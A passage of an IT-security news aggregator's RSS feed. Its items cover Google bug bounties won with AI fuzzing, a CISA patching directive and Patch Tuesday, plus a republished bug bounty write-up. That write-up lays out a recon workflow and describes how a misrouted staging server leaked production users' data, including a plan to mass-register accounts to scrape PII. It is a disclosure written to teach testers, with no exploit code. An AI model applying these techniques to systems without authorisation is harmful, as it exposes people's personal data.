</a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1u6hn2f/initial_reverse_engineering_notes_on_a_generic/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1u6hn2f/initial_reverse_engineering_notes_on_a_generic/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Following through in Cleveland: A GeekWire trip report, plus data center ‘theater’ and the SpaceX IPO]]></title>
<description><![CDATA[John Cook and Charles Fitzgerald call into the podcast from an abandoned Westinghouse factory in Cleveland to debrief on a Rust Belt city's comeback and what Seattle can learn from it. Plus: the new data center moratorium, and why Fitzgerald is sitting out the SpaceX IPO. Read More]]></description>
<link>https://tsecurity.de/de/3595812/it-nachrichten/following-through-in-cleveland-a-geekwire-trip-report-plus-data-center-theater-and-the-spacex-ipo/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3595812/it-nachrichten/following-through-in-cleveland-a-geekwire-trip-report-plus-data-center-theater-and-the-spacex-ipo/</guid>
<pubDate>Sat, 13 Jun 2026 17:32:43 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1260" height="709" src="https://cdn.geekwire.com/wp-content/uploads/2026/06/ppt2-1260x709.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://cdn.geekwire.com/wp-content/uploads/2026/06/ppt2-1260x709.jpg 1260w, https://cdn.geekwire.com/wp-content/uploads/2026/06/ppt2-768x432.jpg 768w, https://cdn.geekwire.com/wp-content/uploads/2026/06/ppt2.jpg 1280w" sizes="(max-width: 1260px) 100vw, 1260px"><br>John Cook and Charles Fitzgerald call into the podcast from an abandoned Westinghouse factory in Cleveland to debrief on a Rust Belt city's comeback and what Seattle can learn from it. Plus: the new data center moratorium, and why Fitzgerald is sitting out the SpaceX IPO. <a href="https://www.geekwire.com/2026/following-through-in-cleveland-a-geekwire-trip-report-plus-data-center-theater-and-the-spacex-ipo/">Read More</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[What we learned in Cleveland about Seattle’s future: Advice from a Rust Belt city on the rise]]></title>
<description><![CDATA[What can Seattle learn from Cleveland's fall and comeback? GeekWire's John Cook and Seattle angel investor Charles Fitzgerald spent several days in Cleveland, talking with civic, business and political leaders — including the city's mayor and the governor of Ohio — to find out. Read More]]></description>
<link>https://tsecurity.de/de/3593884/it-nachrichten/what-we-learned-in-cleveland-about-seattles-future-advice-from-a-rust-belt-city-on-the-rise/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3593884/it-nachrichten/what-we-learned-in-cleveland-about-seattles-future-advice-from-a-rust-belt-city-on-the-rise/</guid>
<pubDate>Fri, 12 Jun 2026 17:18:24 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1260" height="789" src="https://cdn.geekwire.com/wp-content/uploads/2026/06/montage-1260x789.png" class="webfeedsFeaturedVisual wp-post-image" alt="" decoding="async" srcset="https://cdn.geekwire.com/wp-content/uploads/2026/06/montage-1260x789.png 1260w, https://cdn.geekwire.com/wp-content/uploads/2026/06/montage-768x481.png 768w, https://cdn.geekwire.com/wp-content/uploads/2026/06/montage.png 1478w" sizes="(max-width: 1260px) 100vw, 1260px"><br>What can Seattle learn from Cleveland's fall and comeback? GeekWire's John Cook and Seattle angel investor Charles Fitzgerald spent several days in Cleveland, talking with civic, business and political leaders — including the city's mayor and the governor of Ohio — to find out. <a href="https://www.geekwire.com/2026/what-we-learned-in-cleveland-about-seattles-future-advice-from-a-rust-belt-city-on-the-rise/">Read More</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Researcher Uses AI to Uncover Google Vulnerabilities, Earns $500,000 Bug Bounty]]></title>
<description><![CDATA[A security researcher known as Brutecat has disclosed one of the most sophisticated and lucrative vulnerability research campaigns ever carried out against Google, earning a staggering $500,000 in bug bounty rewards in under three months by combining AI-powered fuzzing with deep API reconnaissanc...]]></description>
<link>https://tsecurity.de/de/3592805/it-security-nachrichten/researcher-uses-ai-to-uncover-google-vulnerabilities-earns-500000-bug-bounty/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3592805/it-security-nachrichten/researcher-uses-ai-to-uncover-google-vulnerabilities-earns-500000-bug-bounty/</guid>
<pubDate>Fri, 12 Jun 2026 09:57:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A security researcher known as Brutecat has disclosed one of the most sophisticated and lucrative vulnerability research campaigns ever carried out against Google, earning a staggering $500,000 in bug bounty rewards in under three months by combining AI-powered fuzzing with deep API reconnaissance. The research began after Brutecat was invited to Google’s bugSWAT Mexico event in October 2025, which reignited interest […]</p>
<p>The post <a href="https://cyberpress.org/researcher-ai-uncover-google-vulnerabilities/">Researcher Uses AI to Uncover Google Vulnerabilities, Earns $500,000 Bug Bounty</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Researcher Uses AI to Hack Google, Earns $500,000 Bug Bounty]]></title>
<description><![CDATA[Researcher Arvin Shivram has earned $500,000 in bug bounties from Google’s Vulnerability Reward Program (VRP) by deploying an AI-powered fuzzing framework against Google’s internal API infrastructure, uncovering critical access-control flaws across multiple high-impact services in under 3 months....]]></description>
<link>https://tsecurity.de/de/3592743/it-security-nachrichten/researcher-uses-ai-to-hack-google-earns-500000-bug-bounty/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3592743/it-security-nachrichten/researcher-uses-ai-to-hack-google-earns-500000-bug-bounty/</guid>
<pubDate>Fri, 12 Jun 2026 09:32:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Researcher Arvin Shivram has earned $500,000 in bug bounties from Google’s Vulnerability Reward Program (VRP) by deploying an AI-powered fuzzing framework against Google’s internal API infrastructure, uncovering critical access-control flaws across multiple high-impact services in under 3 months. The research began after Shivram was…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/researcher-uses-ai-to-hack-google-earns-500000-bug-bounty/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/researcher-uses-ai-to-hack-google-earns-500000-bug-bounty/">Researcher Uses AI to Hack Google, Earns $500,000 Bug Bounty</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Researcher Uses AI to Hack Google, Earns $500,000 Bug Bounty]]></title>
<description><![CDATA[Researcher Arvin Shivram has earned $500,000 in bug bounties from Google’s Vulnerability Reward Program (VRP) by deploying an AI-powered fuzzing framework against Google’s internal API infrastructure, uncovering critical access-control flaws across multiple high-impact services in under 3 months....]]></description>
<link>https://tsecurity.de/de/3592632/it-security-nachrichten/researcher-uses-ai-to-hack-google-earns-500000-bug-bounty/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3592632/it-security-nachrichten/researcher-uses-ai-to-hack-google-earns-500000-bug-bounty/</guid>
<pubDate>Fri, 12 Jun 2026 08:37:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Researcher Arvin Shivram has earned $500,000 in bug bounties from Google’s Vulnerability Reward Program (VRP) by deploying an AI-powered fuzzing framework against Google’s internal API infrastructure, uncovering critical access-control flaws across multiple high-impact services in under 3 months. The research began after Shivram was invited to bugSWAT Mexico in October 2025, which reignited his interest in Google’s attack surface. Recognizing that […]</p>
<p>The post <a href="https://gbhackers.com/researcher-hack-google-earns-500000-bug-bounty/">Researcher Uses AI to Hack Google, Earns $500,000 Bug Bounty</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hacking a Fortune 500 Finance Company via Envoy Proxy Misconfiguration]]></title>
<description><![CDATA[Compromised Account DetailsWhen hunting on a site I tend to just poke around, gauge the functionality and see logically what can be broken before I fuzz.The target (www.REDACTED.com) was a large finance holding company. Almost all their domains were heavily locked down and required employee SSO c...]]></description>
<link>https://tsecurity.de/de/3591630/hacking/hacking-a-fortune-500-finance-company-via-envoy-proxy-misconfiguration/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3591630/hacking/hacking-a-fortune-500-finance-company-via-envoy-proxy-misconfiguration/</guid>
<pubDate>Thu, 11 Jun 2026 21:06:03 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*hcsRAwLxNMghyhKbdi4xSg.png"><figcaption>Compromised Account Details</figcaption></figure><p>When hunting on a site I tend to just poke around, gauge the functionality and see logically what can be broken before I fuzz.</p><p>The target (www.REDACTED.com) was a large finance holding company. Almost all their domains were heavily locked down and required employee SSO credentials to use.</p><p>However, one of their sister websites I discovered by Google Dorking allowed verified authors worldwide publish articles on how to use the company’s financial software sold. However, publishing an article required strict manual approval by the site admins.</p><blockquote>This is a common step missed by bug bounty hunters, make sure to read the scope and see if they allow third party websites to be tested. I typically refer to these as “sister sites”, after finding this domain I shifted my focus on attacking this third party as it was in scope and no longer the main domain.</blockquote><p>I couldn’t find any vulnerabilities on the third party’s main website (www.Sister-REDACTED.com)</p><h4>Recon</h4><p>If you don’t have a recon methodology it may benefit you to read some bug bounty articles on Medium more frequently. What helped me was following users who wrote unique or practical blogs that weren’t generic or similar to ones I’d seen many times.</p><blockquote>Critical Side Note in automated Fuzzing:</blockquote><blockquote>Always include a User-Agent header when fuzzing at the very least. I nearly missed a P1 vulnerability in another target by not doing this.</blockquote><blockquote>While using HTTPX to verify which subdomains were live, a few subdomains consistently returned as being unreachable. However, when I stumbled upon one of the supposedly unreachable subdomains when google dorking they were reachable, I almost missed a whole subdomain.</blockquote><blockquote>Turns out there was a reverse proxy in front of the domain silently dropping any request packets without a proper User-Agent header. Furthermore, the Windows server behind the proxy had ICMP replies disabled making it truly appear as an unreachable domain.</blockquote><blockquote>Even after adding proper headers, I still got inconsistent results with HTTPX. To this day, I haven’t found a reliable solution. Rate limiting was not the issue either, it loaded fine in the browser (even after 1000+ refreshes), but for some reason would fail in HTTPX.</blockquote><ol><li>Fuzz subdomain VHOSTS viaFFUF</li><li>PureDNS for direct DNS enumeration.</li><li>I also went through passive collection of subdomains by using tools such as subfinder and google dorking (site:Sister-REDACTED.com ).</li><li>Looked for related sister sites via:</li></ol><ul><li>FOFA</li><li>SHODAN (Via Favicon hash search)</li><li>Fuzzing TLD via PureDNS (ex: REDACTED.FUZZ )</li></ul><p>5. Scanning ports via Masscan &amp; RustScan</p><ul><li>I stopped over-relying on one tool and lowered the maximum packet rate as it typically leads to inconsistent results.</li></ul><p>6. Scrape endpoints from GAU , WayBackURLS , Dorking</p><ul><li>When dorking I use the <a href="https://chromewebstore.google.com/detail/ggiihlkbikggfknjgbocmogobagckdpc?utm_source=item-share-cb">URL Extractor</a> extension to parse all the URLs from google searches as I dork.</li></ul><p>7. Exposed secrets by searching target-specific keywords on Github , PostMan , etc.</p><h4>Subdomain Analysis</h4><p>After cleaning up and collecting the list I realized there weren’t many subdomains this company offered. However there were two that stuck out to me the most:</p><ul><li>staging.Sister-REDACTED.com</li><li>testing-ignore.Sister-REDACTED.com</li></ul><p>The testing-ignore subdomain was inaccessible and had no digital footprint as to what its purpose was or how the website looked (was not archived in the Wayback Machine).</p><p>I shifted my focus to the staging server, I realized account takeover (ATO) may be possible if I registered an account using an email address that existed in production but not in staging. This would only work if both servers were using the same JWT signing keys. This is a common technique explained more in-depth here: <a href="https://sandh0t.medium.com/the-bad-twin-a-peculiar-case-of-jwt-exploitation-scenario-1efa03e891c0">https://sandh0t.medium.com/the-bad-twin-a-peculiar-case-of-jwt-exploitation-scenario-1efa03e891c0</a>.</p><h4>Black Box Reverse Engineering</h4><p>Unfortunately, when registering a new account there’s an email verification sent-I could not bypass this. But then I caught myself falling into autopilot. I was just following the same checklist everyone runs through.</p><p>Why was I even trying to register with someone else’s email on staging in the first place?</p><p>Well, I told myself my goal was to obtain a JWT from staging and replay it against production. But I was getting ahead of myself, I didn’t even examine the decoded JWT, what if there wasn’t even an email field at all?</p><p>I decoded a JWT from an authenticated login on staging and it looked like this:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*c9vxZ6yZfBceG7lGa8ayhQ.png"><figcaption>I used the token.dev website when decoding the JWT</figcaption></figure><blockquote>Side Note: If you’re a penetration tester make sure to NEVER put a JWT into a public website, regardless of what their claims are.</blockquote><blockquote>All decoding or tedious tasks should be done on your own machine, you can use self-hosted services such as <a href="https://github.com/gchq/CyberChef">CyberChef</a>.</blockquote><p>Okay… so the JWT does have the email field, but what if the server isn’t even using it. If you look closely you’ll notice the id field, what if the server is relying on this over the email field?</p><p>I confirmed this by registering multiple accounts on production and noticed it go from 50,612to 50,613, 50,614, etc. For further verification, I logged in, changed my email and noticed my JWT still had my old email address in it even though my account settings displayed my new updated email address.</p><p>Okay-that confirms my suspicions, the server isn’t even querying the email claim in the JWT anyway, it’s querying the id claim.</p><p>Furthermore, when I did attempt to use the staging JWT on prod it was denied complaining about an invalid signature. Looks like prod and staging used separate signing keys for their JWT tokens.</p><h4>Poor Isolation Breakthrough</h4><p>Before I gave up I clicked around on the staging domain and everything pretty much looked the same-until I went to profile settings and realized it displayed someone else’s email !</p><p>So we have ATO? Not quite. If I sent a password reset request I would see my account details and the reset would be done on my own account (within staging).</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*q_jLFtJJbIl21Vd1nzygCA.png"></figure><p>I decided to poke at the tech stack being used by this company, some common techniques use the <a href="https://chromewebstore.google.com/detail/gppongmhjkpfnbhagpmjfkannfbllamg?utm_source=item-share-cb">Wappalyzer</a> chrome extension, reading response headers sent back from the web server, and skimming any specific keywords in the JavaScript files.</p><p>Turns out this website’s tech stack was using Kubernetes, Nginx, and Envoy proxies!</p><p>Why is this important you may be asking...? Well Kubernetes can get very complex and if you’re not careful, especially when isolating the workflows for prod and staging can lead to mixups.</p><p>So to understand what may have caused this vulnerability we need to see a simple example of how user requests are handled.</p><p>Envoy runs as a config alongside each pod, meaning every request in and out of the cluster passes through it first. It reads the routing rules defined in its sidecar profile and decides where to send the traffic such as to the staging or prod clusters. It’s great for service mesh control, but one bad route and you’re now leaking traffic across environments.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*8JIn_iSqYjXHsv-5yrcWEQ.png"></figure><p>I think this company’s staging servers had separate envoy proxy configurations for different API routes.</p><p>For example, in the staging server when I sent the password reset it may have internally routed my request to an internal endpoint within the correct staging cluster.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*HYNf71qMRE9K6oHMCkxkiw.png"></figure><p>However, in the staging server, when I tried to view my user information the envoy proxy handling my request may have routed the request internally to a prod cluster instead of a staging cluster.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ZPItsfSivrw7l6Vh5qbNHA.png"></figure><h4>Understanding the Internal Tech Stack</h4><p>I also realized a huge gap many bug bounty hunters have in their methodology: they’re so quick to perform subdomain enumeration, ports, etc they forget to take a step back and look at the dead domains too.</p><p>The unreachable subdomains are sometimes scraped from the domain’s SSL certificates and may hint at internal subdomains that are used by the company internally.</p><p>When looking through subfinder’s output again of both the main website www.REDACTED.com and the third party (sister site) www.sister-REDACTED.com I noticed something that stuck out:</p><pre>github.REDACTED.com<br>bitbucket.REDACTED.com<br>github-staging.Sister-REDACTED.com</pre><p>Interesting… this hints at the possibility of the company using their own self-hosted Github servers.</p><p>This information came in handy down the road and without it I may have been unable to piece together what could’ve caused this vulnerability.</p><h4>Theory</h4><p>Remember earlier when we looked through subfinder’s output and spotted github.REDACTED.com and github-staging.Sister-REDACTED.com? That strongly suggests this company is running self-hosted GitHub instances for their development workflow. This is highly likely because we saw it on both the third party sister site AND the main domain.</p><p>This matters because companies that self-host their own Git infrastructure almost always have CI/CD pipelines tied directly to it. These can be Github actions, webhooks, or automated deployments.</p><p>For example, when a developer opens a PR and it gets merged into main, these pipelines typically spin up or redeploy staging environments automatically to mirror production.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*6-7gd3VAO46OXN-J.png"><figcaption>Image sourced from Danskingdom’s blog</figcaption></figure><p>I think that’s exactly what was happening here. The staging and production servers were being set up through some automated deployment pipeline that triggered whenever the production code changed. For example, let’s say a developer at this company made a simple change to an HTML file, opened a PR that got approved, and merged it into main.</p><p>I suspect these automated pipelines were spinning up staging environments correctly but failing to update all of the Envoy routing configurations for certain endpoints. Because of this, my staging user ID was being mapped to a production user ID due to poor isolation between the two environments.</p><p>For example, let’s say after a new PR was merged to the main branch a pipeline ran that went through the production sidecar profiles and ran simple .replace() on them but failed to do it correctly for one of the endpoints for some reason.</p><h4>Impact</h4><p>We now have leakage of mass PII of all accounts, we can create a script to register accounts on the staging subdomain, and then scrape the account information associated with it.</p><p>We also could mass create accounts on staging with an email address we own -&gt; check account details -&gt; check if there are any patterns such as admin@REDACTED.com and use that JWT to fuzz in hopes of finding any that are admin-restricted to further our attack surface.</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=8f4620c035b2" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/part-1-of-abusing-envoy-kubernetes-staging-servers-verb-tampering-to-achieve-xss-idors-and-8f4620c035b2">Hacking a Fortune 500 Finance Company via Envoy Proxy Misconfiguration</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Researcher Hacked Google Using AI and Earned $500,000 Bug Bounty]]></title>
<description><![CDATA[A security researcher known as brutecat has disclosed how an AI-driven fuzzing pipeline uncovered more than $500,000 in vulnerabilities across Google’s infrastructure in under three months, exposing systemic access-control failures hidden inside roughly 1,500 APIs. The researcher began by targeti...]]></description>
<link>https://tsecurity.de/de/3591337/it-security-nachrichten/researcher-hacked-google-using-ai-and-earned-500000-bug-bounty/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3591337/it-security-nachrichten/researcher-hacked-google-using-ai-and-earned-500000-bug-bounty/</guid>
<pubDate>Thu, 11 Jun 2026 18:52:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A security researcher known as brutecat has disclosed how an AI-driven fuzzing pipeline uncovered more than $500,000 in vulnerabilities across Google’s infrastructure in under three months, exposing systemic access-control failures hidden inside roughly 1,500 APIs. The researcher began by targeting Google’s discovery documents machine-readable API specifications, similar to Swagger docs, that list all available endpoints, parameters, and […]</p>
<p>The post <a href="https://cybersecuritynews.com/google-infrastructure-hacked-ai/">Researcher Hacked Google Using AI and Earned $500,000 Bug Bounty</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CISA Sets 72-Hour Patch Window for Federal Systems Facing Highest Cyber Risks]]></title>
<description><![CDATA[The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has introduced a new risk-based approach to vulnerability remediation, requiring federal civilian agencies to patch the most dangerous cyber vulnerabilities within 72 hours. Announced through Binding Operational Directive (BOD) 26-0...]]></description>
<link>https://tsecurity.de/de/3589618/it-security-nachrichten/cisa-sets-72-hour-patch-window-for-federal-systems-facing-highest-cyber-risks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589618/it-security-nachrichten/cisa-sets-72-hour-patch-window-for-federal-systems-facing-highest-cyber-risks/</guid>
<pubDate>Thu, 11 Jun 2026 08:12:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/CISA-vulnerability-management-directive.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="CISA vulnerability management directive" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/CISA-vulnerability-management-directive.webp 1536w, https://thecyberexpress.com/wp-content/uploads/CISA-vulnerability-management-directive-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/CISA-vulnerability-management-directive-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/CISA-vulnerability-management-directive-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/CISA-vulnerability-management-directive-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/CISA-vulnerability-management-directive-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/CISA-vulnerability-management-directive-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/CISA-vulnerability-management-directive-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/CISA-vulnerability-management-directive.webp 1536w, https://thecyberexpress.com/wp-content/uploads/CISA-vulnerability-management-directive-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/CISA-vulnerability-management-directive-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/CISA-vulnerability-management-directive-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/CISA-vulnerability-management-directive-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/CISA-vulnerability-management-directive-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/CISA-vulnerability-management-directive-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/CISA-vulnerability-management-directive-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="CISA Sets 72-Hour Patch Window for Federal Systems Facing Highest Cyber Risks 1"></p>The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has introduced a new risk-based approach to vulnerability remediation, requiring federal civilian agencies to patch the most dangerous cyber vulnerabilities within 72 hours. Announced through Binding Operational Directive (BOD) 26-04, the new CISA vulnerability management directive replaces older remediation requirements with a framework designed to prioritize vulnerabilities that pose the greatest risk to government systems.

The move comes as cybersecurity officials warn that <a href="https://thecyberexpress.com/future-proof-career-artificial-intelligence-era/" target="_blank" rel="noopener">artificial intelligence</a> is helping threat actors identify and exploit security flaws faster than ever before. The directive aims to improve federal <a href="https://thecyberexpress.com/why-government-cisos-are-near-breaking-point/" target="_blank" rel="noopener">cyber resilience</a> while ensuring agencies focus resources on threats most likely to be exploited.
<h3><strong>New Risk-Based Model for Vulnerability Remediation</strong></h3>
Under the directive, federal civilian agencies must evaluate vulnerabilities against <a href="https://www.cisa.gov/news-events/directives/bod-26-04-prioritizing-security-updates-based-risk" target="_blank" rel="nofollow noopener">four key criteria</a>:
<ul>
 	<li>Asset exposure to the public <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-internet/" title="internet" data-wpil-keyword-link="linked" data-wpil-monitor-id="28658">internet</a></li>
 	<li>Inclusion in CISA's <a href="https://thecyberexpress.com/vmware-vcenter-cve-2024-37079-exploited/" target="_blank" rel="noopener">Known Exploited Vulnerabilities (KEV) </a>catalog</li>
 	<li>Whether exploitation can be automated</li>
 	<li>The level of control an attacker could gain after exploitation</li>
</ul>
According to CISA officials, <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-vulnerabilities/" title="vulnerabilities" data-wpil-keyword-link="linked" data-wpil-monitor-id="28655">vulnerabilities</a> meeting three of these four conditions will face accelerated remediation deadlines.

The strictest requirement applies to vulnerabilities that are actively exploited, can be automated, and affect internet-facing systems. Agencies must patch such vulnerabilities within 72 hours.

In cases where exploitation could allow attackers to gain complete control of a system, agencies are also required to investigate whether a compromise has already occurred before applying <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="security" data-wpil-keyword-link="linked" data-wpil-monitor-id="28653">security</a> updates.

For vulnerabilities that meet similar risk criteria but cannot be exploited automatically, agencies will have up to 14 days to complete remediation, provided attackers have not already achieved full system control.

Federal agencies have been given 180 days to update their internal policies and adopt the new timelines.
<h3><strong>CISA Vulnerability Management Directive Responds to AI-Driven Cyber Threats</strong></h3>
A key driver behind the CISA <a class="wpil_keyword_link" href="https://thecyberexpress.com/firewall-daily/vulnerabilities/" title="vulnerability" data-wpil-keyword-link="linked" data-wpil-monitor-id="28651">vulnerability</a> management directive is the growing concern that artificial intelligence is reducing the time between the release of a security patch and active exploitation by threat actors.

CISA noted that cybercriminals are increasingly leveraging<a href="https://thecyberexpress.com/ai-powered-bots-create-governance-challenges/" target="_blank" rel="noopener"> AI-powered tools</a> to discover, analyze, and exploit vulnerabilities more efficiently. As a result, defenders have less time to respond once a vulnerability becomes public.

The agency said the new framework reflects today's threat environment by considering not only the vulnerability itself but also attacker capabilities, exploitability, asset exposure, and the potential consequences of a successful attack.

By combining these factors, CISA aims to help agencies make informed remediation decisions without overwhelming IT teams with unnecessary patching activities.
<h3><strong>Directive Consolidates Existing Federal Requirements</strong></h3>
The new directive harmonizes and updates requirements from two previous federal <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-cybersecurity/" title="cybersecurity" data-wpil-keyword-link="linked" data-wpil-monitor-id="28656">cybersecurity</a> mandates:
<ul>
 	<li>BOD 19-02, which focused on vulnerability remediation for internet-accessible systems</li>
 	<li>BOD 22-01, which addressed <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-risks-in-cybersecurity/" title="risks" data-wpil-keyword-link="linked" data-wpil-monitor-id="28654">risks</a> associated with Known Exploited Vulnerabilities (KEV)</li>
</ul>
Rather than treating all vulnerabilities equally, the updated approach prioritizes those most likely to be weaponized by attackers.

Acting CISA Director Nick Andersen <a href="https://www.cisa.gov/news-events/news/cisa-issues-new-directive-improving-how-federal-agencies-prioritize-mitigation-cyber-vulnerabilities" target="_blank" rel="nofollow noopener">said</a> the directive is intended to help agencies focus on areas of highest risk while improving transparency, predictability, and resource planning for remediation efforts.

The agency also encouraged organizations outside the federal government to adopt similar risk-based <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-vulnerability-management/" target="_blank" rel="noopener" title="vulnerability management" data-wpil-keyword-link="linked" data-wpil-monitor-id="28657">vulnerability management</a> practices.
<h3><strong>Agencies Must Check for Compromise Before Patching</strong></h3>
One of the most significant additions in the new directive is the requirement for agencies to determine whether a vulnerable system has already been compromised before applying patches.

<a href="https://thecyberexpress.com/?s=CISA" target="_blank" rel="noopener">CISA</a> emphasized that installing a security update does not automatically remove attackers who may already have gained access to a network.

As a result, agencies must assess when and how a compromise occurred and conduct appropriate investigations before remediation. This requirement reflects growing concerns that attackers often maintain persistence inside networks even after vulnerabilities are patched.

The agency described compromise assessment as a critical component of effective cybersecurity <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-risk-management/" title="risk management" data-wpil-keyword-link="linked" data-wpil-monitor-id="28652">risk management</a>, particularly for vulnerabilities already known to be exploited in the wild.
<h3><strong>Strengthening Federal Cybersecurity Readiness</strong></h3>
The CISA vulnerability management directive aligns with broader U.S. government efforts to strengthen cybersecurity and secure federal information systems against increasingly sophisticated threats.

The directive supports objectives outlined in the Executive Order on Promoting Advanced Artificial Intelligence Innovation and Security, which calls for enhanced protection of civilian federal networks.

As agencies implement the new requirements, CISA will monitor compliance, track progress, and provide support where necessary. The agency said the initiative represents an important step toward reducing cybersecurity risk across the federal enterprise while ensuring faster responses to the vulnerabilities most likely to be targeted by attackers.]]></content:encoded>
</item>
<item>
<title><![CDATA[June Patch Tuesday marks a ‘new normal’ with over 200 CVEs, 32 rated ‘critical’]]></title>
<description><![CDATA[June’s Patch Tuesday security updates have arrived, with SAP fixing four critical vulnerabilities and Microsoft addressing over 200 CVEs. Microsoft’s to-do list includes fixes for three zero days, 32 patches rated as ‘critical’, and a batch of other high-risk vulnerabilities that need urgent asse...]]></description>
<link>https://tsecurity.de/de/3588057/it-security-nachrichten/june-patch-tuesday-marks-a-new-normal-with-over-200-cves-32-rated-critical/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3588057/it-security-nachrichten/june-patch-tuesday-marks-a-new-normal-with-over-200-cves-32-rated-critical/</guid>
<pubDate>Wed, 10 Jun 2026 16:56:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>June’s Patch Tuesday security updates have arrived, with SAP fixing four critical vulnerabilities and Microsoft addressing over 200 CVEs. Microsoft’s to-do list includes fixes for three zero days, 32 patches rated as ‘critical’, and a batch of other high-risk vulnerabilities that need urgent assessment. There’s also one older flaw under exploit, and some patches affecting enterprise products for which Microsoft says exploitation is likely. Adobe, too, fixed critical vulnerabilities in enterprise software.</p>



<h2 class="wp-block-heading">Vulnerability surge</h2>



<p>It’s a record haul for Patch Tuesday CVEs — and that’s not counting the other exploited vulnerabilities Microsoft has patched out-of-band since its May update.</p>



<p>Microsoft recently told customers it expects the number of vulnerabilities in monthly updates to continue rising, influenced by the growing use of AI tools. As a <a href="https://www.microsoft.com/en-us/msrc/blog/2026/05/a-note-on-patch-tuesday" target="_blank" rel="noreferrer noopener">May post</a> by the Microsoft Security Response Center put it: “As larger releases settle in as a norm, the way we deliver and decide on updates remains consistent. Patch Tuesday continues as our predictable rhythm for on-premises software,” Going forward, customers should brace themselves for more out-of-band updates, it added.</p>



